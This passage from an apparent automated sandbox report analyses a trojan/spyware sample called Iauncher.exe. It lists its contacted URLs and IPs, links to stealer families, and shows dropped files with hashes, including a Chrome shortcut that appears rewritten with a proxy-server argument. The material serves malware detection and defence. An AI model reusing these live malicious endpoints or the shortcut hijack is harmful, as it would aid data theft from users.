                                                                                              http://tempuri.org/Entity/Id1ResponseDRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://antiloxss.usite.proIauncher.exe, 00000000.00000002.3676644672.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://tempuri.org/Entity/Id9ResponseRegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://tempuri.org/Entity/Id20RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://tempuri.org/Entity/Id21RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://tempuri.org/Entity/Id22RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://tempuri.org/Entity/Id23RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://tempuri.org/Entity/Id24RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://tempuri.org/Entity/Id24ResponseRegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://tempuri.org/Entity/Id1ResponseRegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedRegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildLink.txtdIauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressingRegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://communitykeyv1.000webhostapp.com/Decoder4.php?string=Iauncher.exefalse
                                                                                                                              		high
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://ns.adp/1.0/RegAsm.exe, 0000000D.00000002.1436552204.0000000000C1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/trustRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://tempuri.org/Entity/Id10RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    http://tempuri.org/Entity/Id11RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://antiloxss.usite.pro/STLprograms/NEW/hwid.txtdIauncher.exe, 00000000.00000002.3676644672.0000000002BD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://tempuri.org/Entity/Id12RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      http://tempuri.org/Entity/Id16ResponseRegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://tempuri.org/Entity/Id13RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          http://tempuri.org/Entity/Id14RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          http://tempuri.org/Entity/Id15RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          http://tempuri.org/Entity/Id16RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/NonceRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://tempuri.org/Entity/Id17RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://tempuri.org/Entity/Id18RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://tempuri.org/Entity/Id5ResponseRegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://tempuri.org/Entity/Id19RegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsRegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://tempuri.org/Entity/Id10ResponseRegAsm.exe, 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              http://gitgo.orgdIauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RenewRegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high

                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public IPs

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                147.45.47.65
                                                                                                                                                		unknownRussian Federation
                                                                                                                                                		2895FREE-NET-ASFREEnetEUtrue
                                                                                                                                                193.109.246.100
                                                                                                                                                		antiloxss.usite.proVirgin Islands (BRITISH)
                                                                                                                                                		204343COMPUBYTE-ASRUfalse
                                                                                                                                                172.67.202.98
                                                                                                                                                		gitgo.orgUnited States
                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                172.253.122.101
                                                                                                                                                		google.comUnited States
                                                                                                                                                		15169GOOGLEUSfalse

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                Analysis ID:1434866
                                                                                                                                                Start date and time:2024-05-01 20:34:53 +02:00
                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 9m 34s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:full
                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                Number of analysed new started processes analysed:23
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Sample name:Iauncher.exe
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal96.troj.spyw.evad.winEXE@6/7@3/4
                                                                                                                                                EGA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 97%
                                                                                                                                                • Number of executed functions: 231
                                                                                                                                                • Number of non-executed functions: 68
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                Warnings

                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                • VT rate limit hit for: Iauncher.exe

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                TimeTypeDescription
                                                                                                                                                20:35:43API Interceptor8751389x Sleep call for process: Iauncher.exe modified
                                                                                                                                                20:36:01API Interceptor17x Sleep call for process: RegAsm.exe modified

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                193.109.246.100Undetections.exeGet hashmaliciousVidarBrowse

                                                                                                                                                  Domains

                                                                                                                                                  No context

                                                                                                                                                  ASNs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  COMPUBYTE-ASRUUndetections.exeGet hashmaliciousVidarBrowse
                                                                                                                                                  • 193.109.246.100
                                                                                                                                                  T4IoJqcAwY.exeGet hashmaliciousNymaim, SmokeLoader, Zealer Stealer, onlyLoggerBrowse
                                                                                                                                                  • 193.109.246.62
                                                                                                                                                  https://www.minstroy.saratov.gov.ru/communication/blog/admin-blg/1.php?pagen=12Get hashmaliciousUnknownBrowse
                                                                                                                                                  • 193.109.247.233
                                                                                                                                                  njw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 193.109.247.229
                                                                                                                                                  CLOUDFLARENETUStZvjMg3Hw9.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                                                                                                                  • 172.67.151.19
                                                                                                                                                  Sean Eichler.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.16.117.116
                                                                                                                                                  https://www.canva.com/design/DAGEAa4PcvI/o5lifZGBI-4kJErApUzUSw/view?utm_content=DAGEAa4PcvI&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 104.16.103.112
                                                                                                                                                  [V2]launcher.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                                                                                                                                                  • 104.21.73.118
                                                                                                                                                  https://www.canva.com/design/DAGEAa4PcvI/o5lifZGBI-4kJErApUzUSw/view?utm_content=DAGEAa4PcvI&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 104.17.2.184
                                                                                                                                                  https://2625819278.org/MIg2p2Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 104.17.25.14
                                                                                                                                                  https://2625819278.org/MIg2p2Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 104.17.2.184
                                                                                                                                                  https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c2e8c3b1-63be-4a97-a3b9-a21649a6fcffGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 172.66.0.163
                                                                                                                                                  https://2625819278.org/MIg2p2Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 104.17.25.14
                                                                                                                                                  https://info.allproscales.com/e/1068402/v8lfjdMKG7A---MRecipient-Email/zkryx/856161333/h/wDvG5Cmj_LiS5vXP0t8exJUISMeCcNnbTO0v8uSzUVkGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 104.17.2.184
                                                                                                                                                  FREE-NET-ASFREEnetEUtZvjMg3Hw9.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                                                                                                                  • 193.233.132.226
                                                                                                                                                  2zdult23rz.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                                                  • 147.45.47.93
                                                                                                                                                  file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                                                  • 147.45.47.93
                                                                                                                                                  file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                                                                                                  • 193.233.132.175
                                                                                                                                                  fBirvIlaOJ.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                  • 147.45.47.36
                                                                                                                                                  VOrqSh1Fts.exeGet hashmaliciousNeoreklami, PureLog StealerBrowse
                                                                                                                                                  • 193.233.132.234
                                                                                                                                                  WlCIinu0yp.exeGet hashmaliciousLummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, Socks5Systemz, Vidar, zgRATBrowse
                                                                                                                                                  • 147.45.47.93
                                                                                                                                                  file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                                                                                                  • 193.233.132.47
                                                                                                                                                  file.exeGet hashmaliciousLummaC, GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                                                                                                                  • 147.45.47.93
                                                                                                                                                  http://147.45.47.87Get hashmaliciousUnknownBrowse
                                                                                                                                                  • 147.45.47.87

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0eLuminar_v4.0.1.htaGet hashmaliciousCobalt Strike, Atlantida StealerBrowse
                                                                                                                                                  • 172.67.202.98
                                                                                                                                                  • 193.109.246.100
                                                                                                                                                  [V2]launcher.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                                                                                                                                                  • 172.67.202.98
                                                                                                                                                  • 193.109.246.100
                                                                                                                                                  Hola-Browser-Setup-C-Mmd1.exeGet hashmaliciousPureLog Stealer, SilentXMRMiner, XmrigBrowse
                                                                                                                                                  • 172.67.202.98
                                                                                                                                                  • 193.109.246.100
                                                                                                                                                  0ED4nPDjeo.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                  • 172.67.202.98
                                                                                                                                                  • 193.109.246.100
                                                                                                                                                  Dy4Oz8C1yF.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                  • 172.67.202.98
                                                                                                                                                  • 193.109.246.100
                                                                                                                                                  KG8KxoD6n4.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                  • 172.67.202.98
                                                                                                                                                  • 193.109.246.100
                                                                                                                                                  twkBksZzkc.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                  • 172.67.202.98
                                                                                                                                                  • 193.109.246.100
                                                                                                                                                  Agreement.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 172.67.202.98
                                                                                                                                                  • 193.109.246.100
                                                                                                                                                  uF8wwjO0iU.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                  • 172.67.202.98
                                                                                                                                                  • 193.109.246.100
                                                                                                                                                  Price List MAYQTRA031244PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                  • 172.67.202.98
                                                                                                                                                  • 193.109.246.100

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\Public\Desktop\Google Chrome.lnk

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Thu Oct 5 06:54:36 2023, atime=Wed Sep 27 08:36:54 2023, length=3242272, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2104
                                                                                                                                                  Entropy (8bit):3.481108946577087
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:8SR7dvTgtI0lRYrnvPdAKRkdAGdAKRFdAKRr:8SLcq7
                                                                                                                                                  MD5:8C876C6FF585E5C109E7FD29485E53CC
                                                                                                                                                  SHA1:F2043B06F324B7E120EBF745304FD92AD39F17FD
                                                                                                                                                  SHA-256:E03324A5760227306BEBDFD7A58D1CE895463F42BF95A16A8725A6D82FE656B0
                                                                                                                                                  SHA-512:485F5A2FB4D83879C71560A38A050C9AA1D57D6CA56C4AA0A20A514820337CAA1B404258B067DAFA741281A15E98D9D5C5671C4A76B1792DB2CA78CA36F27CAE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview:L..................F.@.. ......,......Y/a....X.&&... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....EW.=..PROGRA~1..t......O.IEW.>....B...............J.......z.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VEW.8....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.8..Chrome..>......CW.VEW.8....M.....................>.i.C.h.r.o.m.e.....`.1.....EW.8..APPLIC~1..H......CW.VEW.8..........................>.i.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.L .chrome.exe..F......CW.VEW.>..........................l...c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3274
                                                                                                                                                  Entropy (8bit):5.3318368586986695
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlqY
                                                                                                                                                  MD5:0B2E58EF6402AD69025B36C36D16B67F
                                                                                                                                                  SHA1:5ECC642327EF5E6A54B7918A4BD7B46A512BF926
                                                                                                                                                  SHA-256:4B0FB8EECEAD6C835CED9E06F47D9021C2BCDB196F2D60A96FEE09391752C2D7
                                                                                                                                                  SHA-512:1464106CEC5E264F8CEA7B7FF03C887DA5192A976FBC9369FC60A480A7B9DB0ED1956EFCE6FFAD2E40A790BD51FD27BB037256964BC7B4B2DA6D4D5C6B267FA1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Tmp2498.tmp

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2662
                                                                                                                                                  Entropy (8bit):7.8230547059446645
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                                                                                                  MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                                                                                                  SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                                                                                                  SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                                                                                                  SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Tmp24A8.tmp

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2662
                                                                                                                                                  Entropy (8bit):7.8230547059446645
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                                                                                                  MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                                                                                                  SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                                                                                                  SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                                                                                                  SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
